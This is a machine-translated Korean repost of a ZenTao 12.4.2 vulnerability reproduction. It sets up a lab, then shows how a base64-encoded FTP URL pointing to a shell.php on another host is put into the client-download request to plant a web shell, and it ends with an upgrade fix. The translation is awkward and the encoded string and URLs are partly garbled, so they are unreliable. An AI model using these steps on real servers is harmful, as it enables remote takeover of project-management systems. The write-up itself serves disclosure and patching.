> 운영 및 유지보수 > 안전 > ZenTao 12.4.2에서 Getshell의 백그라운드 관리자 권한은 무엇입니까?

ZenTao 12.4.2에서 Getshell의 백그라운드 관리자 권한은 무엇입니까?

WBOY
풀어 주다: 2023-05-16 15:43:12
앞으로
1569명이 탐색했습니다.

0x00소개

ZenTao는 제품 관리, 프로젝트 관리, 품질 관리, 문서 관리, 조직 관리, 트랜잭션 관리를 통합하여 R&D 프로젝트의 핵심 프로세스를 완벽하게 다루는 국내 전문 오픈 소스 R&D 프로젝트 관리 소프트웨어입니다. 관리. 관리 아이디어는 국제적으로 대중화된 Agile 프로젝트 관리 방법인 Scrum을 기반으로 하며, 그 가치를 기반으로 국내 프로젝트 연구 개발 현황과 결합하여 작업 관리, 수요 관리, 버그 관리 등 여러 기능을 통합합니다. , 사용 사례 관리 등 소프트웨어를 계획부터 릴리스의 전체 수명 주기까지 포괄합니다.

0x01 취약점 개요

ZenTao 버전 12.4.2에는 임의 파일 다운로드 취약점이 있습니다. 이 취약점은 클라이언트 클래스의 다운로드 방법 필터링이 엄격하지 않고 ftp를 사용하여 파일을 다운로드할 수 있기 때문에 발생합니다. 그리고 다운로드한 파일 저장 디렉터리는 PHP 파일을 구문 분석하여 getshell을 유발할 수 있습니다.

0x02 영향을 받는 버전

ZenTao ≤ 12.4.2

0x03 환경 구축

phpstudy2018 + ZenTao 12.4.2 ZenTao 공식 다운로드 주소:

https://www.zentao.net/dynamic /zenta opms12. 4.2-80263.html

3.1.다운로드가 완료된 후 phpstudy에 넣고 설치하세요

ZenTao 12.4.2에서 Getshell의 백그라운드 관리자 권한은 무엇입니까?

3.2. 실패한 확장이 있으면 phpstudy에서 열어보세요.

ZenTao 12.4.2에서 Getshell의 백그라운드 관리자 권한은 무엇입니까?

3.3. 여기에서 데이터베이스 정보를 자신만의 데이터베이스 구성으로 설정하세요.

ZenTao 12.4.2에서 Getshell의 백그라운드 관리자 권한은 무엇입니까?

3.4. 계정을 설정하면 설치가 완료됩니다

ZenTao 12.4.2에서 Getshell의 백그라운드 관리자 권한은 무엇입니까?

3.4. 환경을 사용하여 ftp 서비스를 구축합니다. windows2008R2를 예로 들어 역할을 추가하고 ftp

ZenTao 12.4.2에서 Getshell의 백그라운드 관리자 권한은 무엇입니까?

ZenTao 12.4.2에서 Getshell의 백그라운드 관리자 권한은 무엇입니까?

3.5. 그런 다음 인터넷 정보 서비스 아래의 웹 사이트에 ftp 서비스를 추가합니다.

ZenTao 12.4.2에서 Getshell의 백그라운드 관리자 권한은 무엇입니까?

3.6 상황에 맞게 구성하고 다음 단계는

ZenTao 12.4.2에서 Getshell의 백그라운드 관리자 권한은 무엇입니까?

ZenTao 12.4.2에서 Getshell의 백그라운드 관리자 권한은 무엇입니까?

ZenTao 12.4.2에서 Getshell의 백그라운드 관리자 권한은 무엇입니까?

3.7입니다. 정상적으로 접속됨

ZenTao 12.4.2에서 Getshell의 백그라운드 관리자 권한은 무엇입니까?

0x04 취약점이 다시 나타남

1. 먼저 ftp 경로를 쉘에 추가하고 base64 인코딩을 수행하세요

암호화 전: ftp://192.168.3.200/shell.php

암호화 후: ZnRwJTNBLy8xOTIu MTY4LjMuMjAwL3NoZWxsLnBocA ==

2.EXP를 사용하여 암호화된 base64를 exp

http://127.0.0.1/zentaopms/www/index.php/client-download-1-에 넣습니다. 다운로드 링크>- 1.html

ZenTao 12.4.2에서 Getshell의 백그라운드 관리자 권한은 무엇입니까?

ZenTao 12.4.2에서 Getshell의 백그라운드 관리자 권한은 무엇입니까?

3 다음 링크 경로를 사용하여 쉘이 서버에 다운로드되었는지 테스트하세요

http://192.168.3.200/zentaopms/www/data/client /1/shell.php

ZenTao 12.4.2에서 Getshell의 백그라운드 관리자 권한은 무엇입니까?

0x05 복구 방법

1. ZenTao 12.4.3 이상 버전으로 업그레이드

위 내용은 ZenTao 12.4.2에서 Getshell의 백그라운드 관리자 권한은 무엇입니까?의 상세 내용입니다. 자세한 내용은 PHP 중국어 웹사이트의 기타 관련 기사를 참조하세요!

관련 라벨:
원천:yisu.com
본 웹사이트의 성명
본 글의 내용은 네티즌들의 자발적인 기여로 작성되었으며, 저작권은 원저작자에게 있습니다. 본 사이트는 이에 상응하는 법적 책임을 지지 않습니다. 표절이나 침해가 의심되는 콘텐츠를 발견한 경우 admin@php.cn으로 문의하세요.
인기 튜토리얼
더>
최신 다운로드
더>
웹 효과
웹사이트 소스 코드
웹사이트 자료
프론트엔드 템플릿